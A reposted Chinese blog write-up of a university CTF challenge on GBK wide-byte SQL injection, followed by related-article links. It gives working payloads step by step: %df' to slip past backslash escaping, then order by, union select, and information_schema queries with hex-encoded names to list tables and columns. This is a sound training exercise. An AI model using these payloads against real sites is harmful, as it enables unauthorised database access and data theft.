南邮CTF--SQL注入题

最新推荐文章于 2023-10-19 15:54:10 发布
最新推荐文章于 2023-10-19 15:54:10 发布
阅读量164 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/AxsCtion/p/10885837.html
版权

南邮CTF--SQL注入题

题目:GBK SQL injection

解析:

1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入

2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功

3.继续改参数,1=2时,没有任何信息,找到注入点

4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显示错误,确定为2列。

5.既然查询到列,使用联合查询,union select 1,2 %23,

6.获取当前数据库:union select 1,database() %23

7.获取当前数据库名: id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23

group_concat(table_name) 分组以后,把想要显示的列通过gruop_concat()函数拼接在一起。

information_schema.TABLES 切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。

8.获取表名(ctf-4)id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x63746634 %23

 

转载于:https://www.cnblogs.com/AxsCtion/p/10885837.html

weixin_33929309
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,... 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: ... 其他说明: ...
CTF-SQL注入入门
PolarPeak的博客
12-14 5154
CTF SQL注入
ctf库--简单的sql注入
miko2018的博客
08-21 5838
<目> mysql报错注入 格式:flag{} 解链接: http://ctf5.shiyanbar.com/web/index_3.php <解答> 1.打开目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库: Sqlmap -u "...
ctf web练习之SQL注入
weixin_51614848的博客
04-19 481
1.首先看目像SQL注入,于是用burpsuit抓包。针对数据库web2(与目名字一致)再爆表名,使用指令。备注:本文仅供自用,如有错误,欢迎指出。得到列名,再对列进行爆破,使用指令。把以上所有内容复制到1.txt中。2.使用sqlmap,使用指令。
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4244
以pikachu靶场练习来学习ctf知识
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctfctf-pwn赛收集
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 2856
sql注入
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 3525
ctfshow 靶场 web入门 sql注入系列
CTF-SQL注入
weixin_44770698的博客
06-16 4897
CTF-SQL注入目整理
CTF Web SQL注入专项整理(持续更新中)
最新发布
m0_73734159的博客
10-19 1768
SQL注入专项整理
CTF-Web SQL注入
weixin_52182264的博客
04-26 4107
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTFer成长之路之CTF中的SQL注入
众生度尽,方证菩提
02-20 1353
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF入门之SQL注入
PolarPeak的博客
12-08 2052
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6073
关于SQL注入的思维导图可以点开看一下大图
CTFSHOW-sql注入
Yb_140的博客
08-13 2388
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
CTFsql注入练习
07-29
- *1* *2* [CTF-SQL注入入门型](https://blog.csdn.net/weixin_43080961/article/details/121939366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值